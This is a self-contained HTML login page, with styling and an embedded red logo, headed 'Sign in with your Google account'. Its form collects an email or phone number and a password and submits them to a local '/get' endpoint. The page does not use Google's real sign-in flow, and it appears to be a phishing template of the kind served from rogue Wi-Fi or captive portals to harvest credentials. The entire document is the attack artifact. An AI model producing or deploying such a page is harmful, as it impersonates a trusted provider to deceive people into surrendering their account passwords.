<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #CC0026;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #CC0026;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #CC0026;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 1px solid #CC0026;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #CC0026;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
}

.submit-btn:hover {
  background: #CC0026;
}


</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="150.000000pt" height="150.000000pt" viewBox="0 0 1200.000000 1200.000000"
 preserveAspectRatio="xMidYMid meet">

<g transform="translate(0.000000,1200.000000) scale(0.100000,-0.100000)"
fill="#CC0026" stroke="none">
<path d="M3150 9605 l0 -1725 395 0 395 0 -7 43 c-13 68 -9 493 5 592 41 286
105 503 213 720 85 171 173 297 304 434 290 302 653 483 1120 557 139 21 481
30 630 15 507 -51 942 -247 1266 -570 299 -300 473 -669 541 -1146 14 -99 17
-459 5 -572 l-7 -73 415 0 415 0 0 1725 0 1725 -2845 0 -2845 0 0 -1725z"/>
<path d="M5831 9699 c-402 -71 -648 -426 -733 -1054 -18 -134 -18 -697 0 -815
37 -246 93 -449 166 -602 166 -349 453 -528 790 -490 180 20 304 75 427 190
191 178 306 455 366 882 22 160 25 673 5 820 -82 582 -298 937 -637 1047 -65
20 -104 26 -205 29 -69 1 -149 -1 -179 -7z"/>
<path d="M2917 7720 c-43 -13 -95 -57 -116 -98 -10 -20 -263 -721 -562 -1557
-533 -1491 -544 -1521 -544 -1595 0 -89 21 -126 88 -163 l42 -22 4160 0 c4060
0 4161 0 4198 19 21 10 50 35 65 54 24 31 27 44 27 111 -1 75 -10 102 -544
1596 -298 836 -553 1538 -564 1560 -12 21 -42 53 -65 70 l-44 30 -538 3 -538
3 -22 -83 c-146 -545 -509 -975 -1042 -1233 -73 -35 -173 -78 -223 -94 -49
-16 -83 -32 -75 -35 46 -16 324 -90 439 -116 417 -96 796 -124 1021 -75 104
23 249 71 336 110 54 25 75 30 82 22 21 -26 -88 -471 -164 -669 -82 -214 -160
-325 -268 -378 -208 -103 -591 -35 -1191 210 -669 273 -786 316 -1005 370
-158 38 -300 54 -430 47 -129 -7 -200 -25 -310 -79 -113 -55 -244 -184 -310
-305 -25 -45 -52 -85 -60 -88 -19 -8 -39 16 -211 257 -173 242 -200 287 -207
343 -4 36 0 52 19 80 74 110 384 261 679 330 63 15 122 29 130 32 8 3 -12 15
-45 27 -237 90 -492 262 -685 462 -154 159 -249 295 -342 490 -45 94 -128 327
-128 359 0 13 -68 15 -512 14 -282 0 -526 -5 -541 -9z"/>
<path d="M3150 2415 l0 -1725 2845 0 2845 0 0 1725 0 1725 -2845 0 -2845 0 0
-1725z m3195 1016 c45 -20 92 -70 101 -107 4 -14 4 -47 2 -74 -9 -89 -78 -150
-173 -150 -156 0 -230 184 -119 295 54 55 121 67 189 36z m1555 -403 l0 -382
121 162 121 162 174 0 c96 0 174 -4 174 -9 0 -5 -65 -95 -145 -200 -80 -105
-145 -194 -145 -197 0 -3 81 -104 180 -225 99 -120 180 -221 180 -224 0 -3
-84 -5 -187 -5 l-188 0 -140 173 -140 172 -3 -173 -2 -172 -155 0 -155 0 0
650 0 650 155 0 155 0 0 -382z m-3648 317 c144 -13 295 -89 389 -194 59 -65
122 -189 143 -281 20 -82 20 -234 1 -325 -29 -137 -126 -296 -231 -377 -37
-29 -50 -46 -44 -53 14 -16 246 -131 298 -147 23 -7 42 -17 42 -22 0 -4 -28
-36 -63 -70 -75 -74 -130 -101 -183 -92 -44 9 -200 89 -344 178 -101 62 -108
65 -185 71 -280 22 -520 231 -581 506 -22 98 -15 266 16 366 46 149 157 293
280 362 104 59 264 96 370 87 19 -2 61 -6 92 -9z m3033 -365 c22 -6 59 -18 83
-27 l42 -16 0 -128 0 -128 -67 32 c-54 25 -84 32 -146 35 -68 4 -84 1 -133
-23 -78 -38 -108 -86 -112 -179 -5 -92 22 -147 93 -191 43 -26 56 -30 124 -29
69 0 144 19 234 59 16 7 17 -1 15 -116 l-3 -124 -35 -17 c-111 -54 -309 -67
-431 -29 -220 69 -353 279 -318 501 29 186 171 335 365 385 65 16 220 13 289
-5z m-1985 -267 c0 -266 6 -319 41 -354 38 -38 152 -16 201 38 16 17 18 50 20
294 l3 274 153 3 152 3 0 -431 0 -430 -155 0 -155 0 0 41 0 40 -42 -34 c-70
-56 -106 -70 -193 -75 -64 -3 -91 0 -136 17 -72 27 -137 95 -170 177 -22 57
-23 71 -27 362 -2 167 -1 310 2 318 4 11 35 14 156 14 l150 0 0 -257z m1130
-173 l0 -430 -155 0 -155 0 0 423 c0 233 3 427 7 430 3 4 73 7 155 7 l148 0 0
-430z"/>
<path d="M4020 3053 c-63 -23 -141 -104 -171 -178 -20 -52 -23 -77 -23 -185 0
-106 3 -134 22 -180 52 -131 131 -190 263 -198 143 -8 247 54 311 186 32 65
33 71 33 192 0 108 -4 133 -24 184 -32 81 -98 150 -167 176 -66 24 -178 26
-244 3z"/>
</g>
</svg>



  </div>

  <div class="form-container">

    <center><h1>Sign in with your Google account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>
	  
      <button class="submit-btn" type="submit">Continue</button>
    

    </form>

  </div>

</div>

</body>
</html>
